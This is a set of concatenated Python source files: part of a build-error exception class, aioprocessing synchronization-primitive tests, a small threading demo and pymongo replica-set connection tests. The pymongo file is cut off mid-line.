        super(ChildError, self).__init__(msg)
        # Module and class name of the original exception (strings, so
        # the error stays pickleable across the process boundary).
        self.module = module
        self.name = classname
        self.traceback = traceback_string
        self.build_log = build_log
        self.context = context
    @property
    def long_message(self):
        """Build-log or Python-code context rendered as a string."""
        out = StringIO()
        out.write(self._long_message if self._long_message else '')
        if (self.module, self.name) in ChildError.build_errors:
            # The error happened in some external executed process. Show
            # the build log with errors or warnings highlighted.
            if self.build_log and os.path.exists(self.build_log):
                errors, warnings = parse_log_events(self.build_log)
                nerr = len(errors)
                nwar = len(warnings)
                if nerr > 0:
                    # If errors are found, only display errors
                    out.write(
                        "\n%s found in build log:\n" % plural(nerr, 'error'))
                    out.write(make_log_context(errors))
                elif nwar > 0:
                    # If no errors are found but warnings are, display warnings
                    out.write(
                        "\n%s found in build log:\n" % plural(nwar, 'warning'))
                    out.write(make_log_context(warnings))
        else:
            # The error happened in the Python code, so try to show
            # some context from the Package itself.
            if self.context:
                out.write('\n')
                out.write('\n'.join(self.context))
                out.write('\n')
        if out.getvalue():
            out.write('\n')
        if self.build_log and os.path.exists(self.build_log):
            out.write('See build log for details:\n')
            out.write(' %s\n' % self.build_log)
        return out.getvalue()
    def __str__(self):
        return self.message + self.long_message + self.traceback
    def __reduce__(self):
        """__reduce__ is used to serialize (pickle) ChildErrors.

        Return a function to reconstruct a ChildError, along with the
        salient properties we'll need.
        """
        return _make_child_error, (
            self.message,
            self.module,
            self.name,
            self.traceback,
            self.build_log,
            self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
    """Used by __reduce__ in ChildError to reconstruct pickled errors."""
    # Must remain a module-level function so it is itself pickleable.
    return ChildError(msg, module, name, traceback, build_log, context)
|
lock_tests.py | import sys
import time
import asyncio
import unittest
import traceback
import aioprocessing
import aioprocessing.mp as multiprocessing
from aioprocessing.mp import Process, Event, Queue, get_all_start_methods
try:
    from aioprocessing.mp import get_context
except ImportError:
    # Back-ends without get_context (older multiprocessing APIs):
    # provide a no-op stand-in so the name always exists below.
    def get_context(param):
        pass
from ._base_test import BaseTest, _GenMixin
# Markers recording which flavor of primitive a test class exercises.
MANAGER_TYPE = 1
STANDARD_TYPE = 2
def get_value(self):
    """Best-effort read of a synchronization primitive's counter.

    Tries, in order: a ``get_value()`` method, the name-mangled
    ``_Semaphore__value`` attribute, then the plain ``_value``
    attribute.  Raises NotImplementedError when none is available.
    """
    try:
        return self.get_value()
    except AttributeError:
        pass
    for attr_name in ('_Semaphore__value', '_value'):
        try:
            return getattr(self, attr_name)
        except AttributeError:
            continue
    raise NotImplementedError
def do_lock_acquire(lock, e):
    # Child-process helper: take the lock, signal the parent via ``e``,
    # hold the lock briefly, then release it.
    lock.acquire()
    e.set()
    time.sleep(2)  # hold long enough for the parent's timed acquire to wait
    lock.release()
def sync_lock(lock, event, event2, queue):
    # Child-process helper: once the parent holds the lock (event2),
    # report whether a non-blocking acquire succeeds (it should not),
    # signal back via ``event``, then block until the parent releases.
    event2.wait()
    queue.put(lock.acquire(False))
    event.set()
    lock.acquire()
    lock.release()
class GenAioLockTest(BaseTest, _GenMixin):
    """Generic _GenMixin-driven tests for AioLock."""

    def setUp(self):
        super().setUp()
        # Attributes consumed by _GenMixin: factory, instance, and the
        # name of the coroutine method to exercise.
        self.Obj = aioprocessing.AioLock
        self.inst = self.Obj()
        self.meth = "coro_acquire"
class GenAioManagerLockTest(GenAioLockTest):
    """Same generic tests, but for a manager-proxied AioLock."""

    def setUp(self):
        super().setUp()
        self.manager = aioprocessing.AioManager()
        self.Obj = self.manager.AioLock
        self.inst = self.Obj()

    @unittest.skipIf(
        not hasattr(multiprocessing, "get_context"), "No get_context method"
    )
    def test_ctx(self):
        # No-op override of the inherited test — presumably contexts do
        # not apply to manager-proxied locks (confirm against _GenMixin).
        pass
class GenAioRLockTest(BaseTest, _GenMixin):
    """Generic _GenMixin-driven tests for AioRLock."""

    def setUp(self):
        super().setUp()
        self.Obj = aioprocessing.AioRLock
        self.inst = self.Obj()
        self.meth = "coro_acquire"
class GenAioConditionTest(BaseTest, _GenMixin):
    """Generic _GenMixin-driven tests for AioCondition."""

    def setUp(self):
        super().setUp()
        self.Obj = aioprocessing.AioCondition
        self.inst = self.Obj()
        self.meth = "coro_acquire"
class GenAioSemaphoreTest(BaseTest, _GenMixin):
    """Generic _GenMixin-driven tests for AioSemaphore."""

    def setUp(self):
        super().setUp()
        self.Obj = aioprocessing.AioSemaphore
        self.inst = self.Obj()
        self.meth = "coro_acquire"
class GenAioEventTest(BaseTest, _GenMixin):
    """Generic _GenMixin-driven tests for AioEvent."""

    def setUp(self):
        super().setUp()
        self.Obj = aioprocessing.AioEvent
        self.inst = self.Obj()
        self.meth = "coro_wait"

    def _after(self):
        # Unblock coro_wait: an event that is never set would wait forever.
        self.inst.set()
class GenAioBarrierTest(BaseTest, _GenMixin):
    """Generic _GenMixin-driven tests for AioBarrier."""

    def setUp(self):
        super().setUp()
        self.Obj = aioprocessing.AioBarrier
        # One party only, so coro_wait completes without other waiters.
        self.inst = self.Obj(1)
        self.initargs = (1,)
        self.meth = "coro_wait"
class LoopLockTest(BaseTest):
    """Acquire a lock on an explicitly supplied (non-default) event loop."""

    def setUp(self):
        # Intentionally skip BaseTest.setUp: this test manages its own loop.
        pass

    def test_lock_with_loop(self):
        loop = asyncio.new_event_loop()
        lock = aioprocessing.AioLock()

        async def do_async_lock():
            await lock.coro_acquire(loop=loop)

        try:
            loop.run_until_complete(do_async_lock())
        finally:
            # Bug fix: the loop was never closed, leaking its resources
            # (selector fd / self-pipe) and emitting ResourceWarning.
            loop.close()
class LockTest(BaseTest):
    """Tests for the plain (non-managed) aioprocessing.AioLock."""

    def setUp(self):
        super().setUp()
        # type_ records which primitive flavor this class exercises.
        self.type_ = STANDARD_TYPE
        self.lock = aioprocessing.AioLock()

    def test_lock(self):
        # Non-reentrant lock: a second non-blocking acquire must fail.
        self.assertEqual(True, self.lock.acquire())
        self.assertEqual(False, self.lock.acquire(False))
        self.assertEqual(None, self.lock.release())

    def test_lock_async(self):
        # Same contract through the coroutine API.
        async def do_async_lock():
            self.assertEqual(True, (await self.lock.coro_acquire()))
            self.assertEqual(None, self.lock.release())
        self.loop.run_until_complete(do_async_lock())

    def test_lock_cm(self):
        # While held in an `async with` block, a child process must fail
        # a non-blocking acquire (reported via the queue by sync_lock).
        event = Event()
        event2 = Event()
        q = Queue()
        async def with_lock():
            async with self.lock:
                event2.set()
                await asyncio.sleep(1)
                event.wait()
        p = Process(target=sync_lock, args=(self.lock, event, event2, q))
        p.start()
        self.loop.run_until_complete(with_lock())
        p.join()
        self.assertFalse(q.get())

    def test_lock_multiproc(self):
        # While a child (do_lock_acquire) holds the lock: non-blocking
        # acquire fails, timed acquire succeeds once the child releases.
        e = Event()
        async def do_async_lock():
            self.assertEqual(False, (await self.lock.coro_acquire(False)))
            self.assertEqual(
                True, (await self.lock.coro_acquire(timeout=4))
            )
        p = Process(target=do_lock_acquire, args=(self.lock, e))
        p.start()
        e.wait()
        self.loop.run_until_complete(do_async_lock())
class LockManagerTest(LockTest):
    """Repeat every LockTest case against a manager-proxied lock."""

    def setUp(self):
        super().setUp()
        self.type_ = MANAGER_TYPE
        manager = aioprocessing.AioManager()
        self.manager = manager
        self.lock = manager.AioLock()

    def tearDown(self):
        super().tearDown()
        self.manager.shutdown()
        self.manager.join()
class RLockTest(LockTest):
    """LockTest variant backed by a reentrant lock."""

    def setUp(self):
        super().setUp()
        self.lock = aioprocessing.AioRLock()

    def test_lock(self):
        # Reentrant: the owner may acquire again without blocking.
        self.assertEqual(self.lock.acquire(), True)
        self.assertEqual(self.lock.acquire(False), True)
        self.assertEqual(self.lock.release(), None)
class RLockManagerTest(RLockTest):
    """RLockTest variant backed by a manager proxy."""

    def setUp(self):
        super().setUp()
        self.type_ = MANAGER_TYPE
        manager = aioprocessing.AioManager()
        self.manager = manager
        self.lock = manager.AioRLock()

    def tearDown(self):
        super().tearDown()
        self.manager.shutdown()
        self.manager.join()
def mix_release(lock, q):
    """Child-process helper for LockMixingTest.

    Verify that *lock* cannot be released by a process that does not hold
    it, then acquire and release it normally. Reports on *q*: True on
    success, an error string if the bogus release did not raise, or a
    formatted traceback on any unexpected exception.
    """
    try:
        try:
            # We do not hold the lock, so this must raise.
            lock.release()
        except (ValueError, AssertionError):
            pass
        else:
            # Fix: message previously read "excepted" instead of "expected".
            q.put("Didn't get expected AssertionError")
        lock.acquire()
        lock.release()
        q.put(True)
    except Exception:
        exc = traceback.format_exception(*sys.exc_info())
        q.put(exc)
class LockMixingTest(BaseTest):
    """Mix synchronous, asynchronous and cross-process use of one lock."""

    def setUp(self):
        super().setUp()
        self.lock = aioprocessing.AioRLock()

    def test_sync_lock(self):
        self.lock.acquire()
        self.lock.release()

    def test_mix_async_to_sync(self):
        # Acquire inside the event loop, release synchronously afterwards.
        async def do_acquire():
            await self.lock.coro_acquire()

        self.loop.run_until_complete(do_acquire())
        self.lock.release()

    def test_mix_with_procs(self):
        # Acquire here, then let a child process (mix_release) verify it
        # cannot release our lock; the child reports a bool on the queue.
        async def do_acquire():
            await self.lock.coro_acquire()

        q = Queue()
        p = Process(target=mix_release, args=(self.lock, q))
        self.loop.run_until_complete(do_acquire())
        p.start()
        self.lock.release()
        out = q.get(timeout=5)
        p.join()
        # A traceback (list of strings) from the child would fail this check.
        self.assertTrue(isinstance(out, bool))
class SpawnLockMixingTest(LockMixingTest):
    """LockMixingTest with a lock bound to the 'spawn' start method."""

    def setUp(self):
        super().setUp()
        spawn_ctx = get_context("spawn")
        self.lock = aioprocessing.AioLock(context=spawn_ctx)
# The forkserver start method is not available on every platform, so this
# test class is defined only when multiprocessing reports support for it.
if "forkserver" in get_all_start_methods():
    class ForkServerLockMixingTest(LockMixingTest):
        """LockMixingTest with a lock bound to the 'forkserver' start method."""

        def setUp(self):
            super().setUp()
            context = get_context("forkserver")
            self.lock = aioprocessing.AioLock(context=context)
class SemaphoreTest(BaseTest):
    """Exercise aioprocessing.AioSemaphore counting semantics."""

    def setUp(self):
        super().setUp()
        # Semaphore with an initial value of 2.
        self.sem = aioprocessing.AioSemaphore(2)

    def _test_semaphore(self, sem):
        # Walk the counter from 2 down to 0 (one sync acquire, one async
        # acquire), confirm exhaustion, then walk it back up to 2.
        self.assertReturnsIfImplemented(2, get_value, sem)
        self.assertEqual(True, sem.acquire())
        self.assertReturnsIfImplemented(1, get_value, sem)

        async def sem_acquire():
            self.assertEqual(True, (await sem.coro_acquire()))

        self.loop.run_until_complete(sem_acquire())
        self.assertReturnsIfImplemented(0, get_value, sem)
        # Counter exhausted: a non-blocking acquire must fail.
        self.assertEqual(False, sem.acquire(False))
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(None, sem.release())
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(None, sem.release())
        self.assertReturnsIfImplemented(2, get_value, sem)

    def test_semaphore(self):
        sem = self.sem
        self._test_semaphore(sem)
        # Unlike a bounded semaphore, releasing past the initial value works.
        self.assertEqual(None, sem.release())
        self.assertReturnsIfImplemented(3, get_value, sem)
        self.assertEqual(None, sem.release())
        self.assertReturnsIfImplemented(4, get_value, sem)
class BoundedSemaphoreTest(SemaphoreTest):
    """SemaphoreTest whose counter may not exceed its initial value."""

    def setUp(self):
        super().setUp()
        self.sem = aioprocessing.AioBoundedSemaphore(2)

    def test_semaphore(self):
        # Run only the shared down/up walk; the extra over-releases from
        # the base class would raise on a bounded semaphore.
        self._test_semaphore(self.sem)
def barrier_wait(barrier, event):
    """Child-process helper: signal *event*, then block on *barrier*."""
    event.set()
    barrier.wait()
class BarrierTest(BaseTest):
    """Exercise aioprocessing.AioBarrier with two parties."""

    def setUp(self):
        super().setUp()
        self.barrier = aioprocessing.AioBarrier(2)

    def _wait_barrier(self):
        # Helper for the commented-out thread variant below.
        self.barrier.wait()

    def test_barrier(self):
        fut = None

        async def wait_barrier_async():
            await self.barrier.coro_wait()

        async def wait_barrier():
            nonlocal fut
            # Park one waiter asynchronously, confirm it is counted,
            # then release both parties with a synchronous wait.
            fut = asyncio.ensure_future(wait_barrier_async())
            await asyncio.sleep(0.5)
            self.assertEqual(1, self.barrier.n_waiting)
            self.barrier.wait()

        # t = threading.Thread(target=self._wait_barrier)
        # t.start()
        self.loop.run_until_complete(wait_barrier())
        self.loop.run_until_complete(fut)

    def test_barrier_multiproc(self):
        # A child blocks on the barrier; once it signals readiness we
        # confirm it is counted as waiting and then join it at the barrier.
        event = Event()
        p = Process(target=barrier_wait, args=(self.barrier, event))
        p.start()

        async def wait_barrier():
            event.wait()
            await asyncio.sleep(0.2)
            self.assertEqual(1, self.barrier.n_waiting)
            await self.barrier.coro_wait()

        self.loop.run_until_complete(wait_barrier())
        p.join()
def set_event(event):
    """Child-process target: set *event*."""
    event.set()
class EventTest(BaseTest):
    """Exercise aioprocessing.AioEvent across processes."""

    def setUp(self):
        super().setUp()
        self.event = aioprocessing.AioEvent()

    def test_event(self):
        # coro_wait must return once the child process sets the event.
        p = Process(target=set_event, args=(self.event,))

        async def wait_event():
            await self.event.coro_wait()

        p.start()
        self.loop.run_until_complete(wait_event())
        p.join()
def cond_notify(cond, event):
    """Child-process helper: after a short delay, set *event* and wake
    every waiter on *cond*."""
    time.sleep(2)
    event.set()
    with cond:
        cond.notify_all()
class ConditionTest(BaseTest):
    """Exercise aioprocessing.AioCondition with a cross-process notifier."""

    def setUp(self):
        super().setUp()
        self.cond = aioprocessing.AioCondition()

    def test_cond(self):
        event = Event()

        def pred():
            # wait_for predicate: true once the child has set the event.
            return event.is_set()

        async def wait_for_pred():
            await self.cond.coro_acquire()
            await self.cond.coro_wait_for(pred)
            self.cond.release()

        p = Process(target=cond_notify, args=(self.cond, event))
        p.start()
        self.loop.run_until_complete(wait_for_pred())
        p.join()
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
04.py | import time
import threading
def test():
    """Sleep five seconds, then print the numbers 1 through 9."""
    time.sleep(5)
    for number in range(1, 10):
        print(number)
# Run test() on a worker thread and block until it finishes.
thread1 = threading.Thread(target=test)
thread1.start()
thread1.join()
# Message translates to: "main thread finished".
print('主线程完成了')
|
test_replica_set_connection.py | # Copyright 2011-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import copy
import datetime
import os
import signal
import socket
import sys
import time
import thread
import traceback
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo.connection import Connection
from pymongo.read_preferences import ReadPreference
from pymongo.replica_set_connection import ReplicaSetConnection
from pymongo.replica_set_connection import _partition_node
from pymongo.database import Database
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
OperationFailure)
from test import version
from test.utils import delay, assertReadFrom, assertReadFromAll, read_from_which_host
# Target mongod/replica-set location, overridable via the environment.
host = os.environ.get("DB_IP", 'localhost')
port = int(os.environ.get("DB_PORT", 27017))
pair = '%s:%d' % (host, port)
class TestReplicaSetConnectionAgainstStandalone(unittest.TestCase):
    """This is a funny beast -- we want to run tests for ReplicaSetConnection
    but only if the database at DB_IP and DB_PORT is a standalone.
    """

    def setUp(self):
        response = Connection(pair).admin.command('ismaster')
        if 'setName' in response:
            raise SkipTest("Connected to a replica set, not a standalone mongod")

    def test_connect(self):
        # Asking a standalone server for a replica set must be rejected.
        self.assertRaises(
            ConfigurationError,
            ReplicaSetConnection,
            pair,
            replicaSet='anything',
            connectTimeoutMS=600,
        )
class TestConnectionReplicaSetBase(unittest.TestCase):
    """Base class: discover the replica-set topology, or skip when the
    target server is a standalone."""

    def setUp(self):
        conn = Connection(pair)
        response = conn.admin.command('ismaster')
        if 'setName' in response:
            self.name = str(response['setName'])
            # Write concern used by tests: every data-bearing member.
            self.w = len(response['hosts'])
            self.hosts = set([_partition_node(h)
                              for h in response["hosts"]])
            self.arbiters = set([_partition_node(h)
                                 for h in response.get("arbiters", [])])

            repl_set_status = conn.admin.command('replSetGetStatus')
            primary_info = [
                m for m in repl_set_status['members']
                if m['stateStr'] == 'PRIMARY'
            ][0]
            self.primary = _partition_node(primary_info['name'])
            self.secondaries = [
                _partition_node(m['name']) for m in repl_set_status['members']
                if m['stateStr'] == 'SECONDARY'
            ]
        else:
            raise SkipTest("Not connected to a replica set")

    def _get_connection(self, **kwargs):
        # Convenience: a ReplicaSetConnection to the discovered set.
        return ReplicaSetConnection(pair,
                                    replicaSet=self.name,
                                    **kwargs)
class TestConnection(TestConnectionReplicaSetBase):
    """Integration tests for ReplicaSetConnection against a live set."""

    def test_connect(self):
        # Unresolvable host, wrong set name, then a good connection.
        self.assertRaises(ConnectionFailure, ReplicaSetConnection,
                          "somedomainthatdoesntexist.org:27017",
                          replicaSet=self.name,
                          connectTimeoutMS=600)
        self.assertRaises(ConfigurationError, ReplicaSetConnection,
                          pair, replicaSet='fdlksjfdslkjfd')
        self.assertTrue(ReplicaSetConnection(pair, replicaSet=self.name))

    def test_repr(self):
        connection = self._get_connection()
        self.assertEqual(repr(connection),
                         "ReplicaSetConnection(%r)" % (["%s:%d" % n
                                                        for n in
                                                        self.hosts],))

    def test_properties(self):
        # Default construction: check every documented default.
        c = ReplicaSetConnection(pair, replicaSet=self.name)
        c.admin.command('ping')
        self.assertEqual(c.primary, self.primary)
        self.assertEqual(c.hosts, self.hosts)
        self.assertEqual(c.arbiters, self.arbiters)
        self.assertEqual(c.max_pool_size, 10)
        self.assertEqual(c.document_class, dict)
        self.assertEqual(c.tz_aware, False)

        # Make sure RSC's properties are copied to Database and Collection
        for obj in c, c.pymongo_test, c.pymongo_test.test:
            self.assertEqual(obj.read_preference, ReadPreference.PRIMARY)
            self.assertEqual(obj.tag_sets, [{}])
            self.assertEqual(obj.secondary_acceptable_latency_ms, 15)
            self.assertEqual(obj.slave_okay, False)
            self.assertEqual(obj.safe, False)

        cursor = c.pymongo_test.test.find()
        self.assertEqual(
            ReadPreference.PRIMARY, cursor._Cursor__read_preference)
        self.assertEqual([{}], cursor._Cursor__tag_sets)
        self.assertEqual(15, cursor._Cursor__secondary_acceptable_latency_ms)
        self.assertEqual(False, cursor._Cursor__slave_okay)
        c.close()

        # Non-default construction: the options must propagate the same way.
        tag_sets = [{'dc': 'la', 'rack': '2'}, {'foo': 'bar'}]
        c = ReplicaSetConnection(pair, replicaSet=self.name, max_pool_size=25,
                                 document_class=SON, tz_aware=True,
                                 slaveOk=False, safe=True,
                                 read_preference=ReadPreference.SECONDARY,
                                 tag_sets=copy.deepcopy(tag_sets),
                                 secondary_acceptable_latency_ms=77)
        c.admin.command('ping')
        self.assertEqual(c.primary, self.primary)
        self.assertEqual(c.hosts, self.hosts)
        self.assertEqual(c.arbiters, self.arbiters)
        self.assertEqual(c.max_pool_size, 25)
        self.assertEqual(c.document_class, SON)
        self.assertEqual(c.tz_aware, True)

        for obj in c, c.pymongo_test, c.pymongo_test.test:
            self.assertEqual(obj.read_preference, ReadPreference.SECONDARY)
            self.assertEqual(obj.tag_sets, tag_sets)
            self.assertEqual(obj.secondary_acceptable_latency_ms, 77)
            self.assertEqual(obj.slave_okay, False)
            self.assertEqual(obj.safe, True)

        cursor = c.pymongo_test.test.find()
        self.assertEqual(
            ReadPreference.SECONDARY, cursor._Cursor__read_preference)
        self.assertEqual(tag_sets, cursor._Cursor__tag_sets)
        self.assertEqual(77, cursor._Cursor__secondary_acceptable_latency_ms)
        self.assertEqual(False, cursor._Cursor__slave_okay)

        # Per-query options override the connection-level ones.
        cursor = c.pymongo_test.test.find(
            read_preference=ReadPreference.NEAREST,
            tag_sets=[{'dc':'ny'}, {}],
            secondary_acceptable_latency_ms=123)
        self.assertEqual(
            ReadPreference.NEAREST, cursor._Cursor__read_preference)
        self.assertEqual([{'dc':'ny'}, {}], cursor._Cursor__tag_sets)
        self.assertEqual(123, cursor._Cursor__secondary_acceptable_latency_ms)
        self.assertEqual(False, cursor._Cursor__slave_okay)

        if version.at_least(c, (1, 7, 4)):
            self.assertEqual(c.max_bson_size, 16777216)
        else:
            self.assertEqual(c.max_bson_size, 4194304)
        c.close()

    def test_get_db(self):
        connection = self._get_connection()

        def make_db(base, name):
            return base[name]

        # Invalid database names must be rejected.
        self.assertRaises(InvalidName, make_db, connection, "")
        self.assertRaises(InvalidName, make_db, connection, "te$t")
        self.assertRaises(InvalidName, make_db, connection, "te.t")
        self.assertRaises(InvalidName, make_db, connection, "te\\t")
        self.assertRaises(InvalidName, make_db, connection, "te/t")
        self.assertRaises(InvalidName, make_db, connection, "te st")

        # Attribute access, item access and explicit construction agree.
        self.assertTrue(isinstance(connection.test, Database))
        self.assertEqual(connection.test, connection["test"])
        self.assertEqual(connection.test, Database(connection, "test"))
        connection.close()

    def test_auto_reconnect_exception_when_read_preference_is_secondary(self):
        c = self._get_connection()
        db = c.pymongo_test

        def raise_socket_error(*args, **kwargs):
            raise socket.error

        # Monkey-patch sendall so every send fails.
        old_sendall = socket.socket.sendall
        socket.socket.sendall = raise_socket_error
        try:
            cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
            self.assertRaises(AutoReconnect, cursor.next)
        finally:
            # Always restore the patched socket method.
            socket.socket.sendall = old_sendall

    def test_operations(self):
        c = self._get_connection()

        # Check explicitly for a case we've commonly hit in tests:
        # a replica set is started with a tiny oplog, a previous
        # test does a big insert that leaves the secondaries
        # permanently "RECOVERING", and our insert(w=self.w) hangs
        # forever.
        rs_status = c.admin.command('replSetGetStatus')
        members = rs_status['members']
        self.assertFalse(
            [m for m in members if m['stateStr'] == 'RECOVERING'],
            "Replica set is recovering, try a larger oplogSize next time"
        )

        db = c.pymongo_test
        db.test.remove({}, safe=True)
        self.assertEqual(0, db.test.count())
        db.test.insert({'foo': 'x'}, safe=True, w=self.w, wtimeout=10000)
        self.assertEqual(1, db.test.count())

        cursor = db.test.find()
        doc = cursor.next()
        self.assertEqual('x', doc['foo'])
        # Ensure we read from the primary
        self.assertEqual(c.primary, cursor._Cursor__connection_id)

        cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
        doc = cursor.next()
        self.assertEqual('x', doc['foo'])
        # Ensure we didn't read from the primary
        self.assertTrue(cursor._Cursor__connection_id in c.secondaries)

        self.assertEqual(1, db.test.count())
        db.test.remove({}, safe=True)
        self.assertEqual(0, db.test.count())
        db.test.drop()
        c.close()

    def test_database_names(self):
        connection = self._get_connection()
        connection.pymongo_test.test.save({"dummy": u"object"})
        connection.pymongo_test_mike.test.save({"dummy": u"object"})
        dbs = connection.database_names()
        self.assertTrue("pymongo_test" in dbs)
        self.assertTrue("pymongo_test_mike" in dbs)
        connection.close()

    def test_drop_database(self):
        connection = self._get_connection()

        self.assertRaises(TypeError, connection.drop_database, 5)
        self.assertRaises(TypeError, connection.drop_database, None)

        # Drop by name...
        connection.pymongo_test.test.save({"dummy": u"object"})
        dbs = connection.database_names()
        self.assertTrue("pymongo_test" in dbs)
        connection.drop_database("pymongo_test")
        dbs = connection.database_names()
        self.assertTrue("pymongo_test" not in dbs)

        # ...and by Database object.
        connection.pymongo_test.test.save({"dummy": u"object"})
        dbs = connection.database_names()
        self.assertTrue("pymongo_test" in dbs)
        connection.drop_database(connection.pymongo_test)
        dbs = connection.database_names()
        self.assertTrue("pymongo_test" not in dbs)
        connection.close()

    def test_copy_db(self):
        c = self._get_connection()
        self.assertTrue(c.in_request())

        self.assertRaises(TypeError, c.copy_database, 4, "foo")
        self.assertRaises(TypeError, c.copy_database, "foo", 4)
        self.assertRaises(InvalidName, c.copy_database, "foo", "$foo")

        c.pymongo_test.test.drop()
        c.drop_database("pymongo_test1")
        c.drop_database("pymongo_test2")

        c.pymongo_test.test.insert({"foo": "bar"})
        self.assertFalse("pymongo_test1" in c.database_names())
        self.assertFalse("pymongo_test2" in c.database_names())

        c.copy_database("pymongo_test", "pymongo_test1")
        # copy_database() didn't accidentally end the request
        self.assertTrue(c.in_request())
        self.assertTrue("pymongo_test1" in c.database_names())
        self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])

        c.end_request()
        self.assertFalse(c.in_request())
        c.copy_database("pymongo_test", "pymongo_test2", pair)
        # copy_database() didn't accidentally restart the request
        self.assertFalse(c.in_request())

        time.sleep(1)
        self.assertTrue("pymongo_test2" in c.database_names())
        self.assertEqual("bar", c.pymongo_test2.test.find_one()["foo"])

        if version.at_least(c, (1, 3, 3, 1)):
            # Authenticated copy: wrong credentials must fail, right ones work.
            c.drop_database("pymongo_test1")
            c.pymongo_test.add_user("mike", "password")

            self.assertRaises(OperationFailure, c.copy_database,
                              "pymongo_test", "pymongo_test1",
                              username="foo", password="bar")
            self.assertFalse("pymongo_test1" in c.database_names())

            self.assertRaises(OperationFailure, c.copy_database,
                              "pymongo_test", "pymongo_test1",
                              username="mike", password="bar")
            self.assertFalse("pymongo_test1" in c.database_names())

            c.copy_database("pymongo_test", "pymongo_test1",
                            username="mike", password="password")
            self.assertTrue("pymongo_test1" in c.database_names())
            time.sleep(2)
            self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
        c.close()

    def test_iteration(self):
        connection = self._get_connection()

        def iterate():
            [a for a in connection]

        # A connection object is not iterable.
        self.assertRaises(TypeError, iterate)
        connection.close()

    def test_disconnect(self):
        c = self._get_connection()
        coll = c.foo.bar

        # Repeated disconnects must be harmless and reconnection implicit;
        # the sequence is exercised twice on purpose.
        c.disconnect()
        c.disconnect()

        coll.count()

        c.disconnect()
        c.disconnect()

        coll.count()

    def test_fork(self):
        """Test using a connection before and after a fork.
        """
        if sys.platform == "win32":
            raise SkipTest("Can't fork on Windows")

        try:
            from multiprocessing import Process, Pipe
        except ImportError:
            raise SkipTest("No multiprocessing module")

        db = self._get_connection().pymongo_test

        # Failure occurs if the connection is used before the fork
        db.test.find_one()
        #db.connection.end_request()

        def loop(pipe):
            while True:
                try:
                    db.test.insert({"a": "b"}, safe=True)
                    for _ in db.test.find():
                        pass
                except:
                    traceback.print_exc()
                    pipe.send(True)
                    os._exit(1)

        cp1, cc1 = Pipe()
        cp2, cc2 = Pipe()

        p1 = Process(target=loop, args=(cc1,))
        p2 = Process(target=loop, args=(cc2,))

        p1.start()
        p2.start()

        p1.join(1)
        p2.join(1)

        p1.terminate()
        p2.terminate()

        p1.join()
        p2.join()

        cc1.close()
        cc2.close()

        # recv will only have data if the subprocess failed
        try:
            cp1.recv()
            self.fail()
        except EOFError:
            pass
        try:
            cp2.recv()
            self.fail()
        except EOFError:
            pass
        db.connection.close()

    def test_document_class(self):
        c = self._get_connection()
        db = c.pymongo_test
        db.test.insert({"x": 1})

        # document_class may be changed after construction...
        self.assertEqual(dict, c.document_class)
        self.assertTrue(isinstance(db.test.find_one(), dict))
        self.assertFalse(isinstance(db.test.find_one(), SON))

        c.document_class = SON
        self.assertEqual(SON, c.document_class)
        self.assertTrue(isinstance(db.test.find_one(), SON))
        self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
        c.close()

        # ...or supplied as a constructor argument.
        c = self._get_connection(document_class=SON)
        db = c.pymongo_test

        self.assertEqual(SON, c.document_class)
        self.assertTrue(isinstance(db.test.find_one(), SON))
        self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))

        c.document_class = dict
        self.assertEqual(dict, c.document_class)
        self.assertTrue(isinstance(db.test.find_one(), dict))
        self.assertFalse(isinstance(db.test.find_one(), SON))
        c.close()

    def test_network_timeout(self):
        no_timeout = self._get_connection()
        timeout_sec = 1
        timeout = self._get_connection(socketTimeoutMS=timeout_sec*1000)

        no_timeout.pymongo_test.drop_collection("test")
        no_timeout.pymongo_test.test.insert({"x": 1}, safe=True)

        # A $where clause that takes a second longer than the timeout
        where_func = delay(1 + timeout_sec)

        def get_x(db):
            doc = db.test.find().where(where_func).next()
            return doc["x"]

        self.assertEqual(1, get_x(no_timeout.pymongo_test))
        self.assertRaises(ConnectionFailure, get_x, timeout.pymongo_test)

        def get_x_timeout(db, t):
            doc = db.test.find(network_timeout=t).where(where_func).next()
            return doc["x"]

        # A per-query network_timeout overrides the connection-level one.
        self.assertEqual(1, get_x_timeout(timeout.pymongo_test, None))
        self.assertRaises(ConnectionFailure, get_x_timeout,
                          no_timeout.pymongo_test, 0.1)
        no_timeout.close()
        timeout.close()

    def test_tz_aware(self):
        self.assertRaises(ConfigurationError, ReplicaSetConnection,
                          tz_aware='foo', replicaSet=self.name)

        aware = self._get_connection(tz_aware=True)
        naive = self._get_connection()
        aware.pymongo_test.drop_collection("test")

        now = datetime.datetime.utcnow()
        aware.pymongo_test.test.insert({"x": now}, safe=True)
        time.sleep(1)

        # Same instant, differing only in tzinfo presence.
        self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
        self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
        self.assertEqual(
            aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
            naive.pymongo_test.test.find_one()["x"])

    def test_ipv6(self):
        try:
            connection = ReplicaSetConnection("[::1]:%d" % (port,),
                                              replicaSet=self.name)
        except:
            # Either mongod was started without --ipv6
            # or the OS doesn't support it (or both).
            raise SkipTest("No IPv6")

        # Try a few simple things
        connection = ReplicaSetConnection("mongodb://[::1]:%d" % (port,),
                                          replicaSet=self.name)
        connection = ReplicaSetConnection("mongodb://[::1]:%d/?safe=true;"
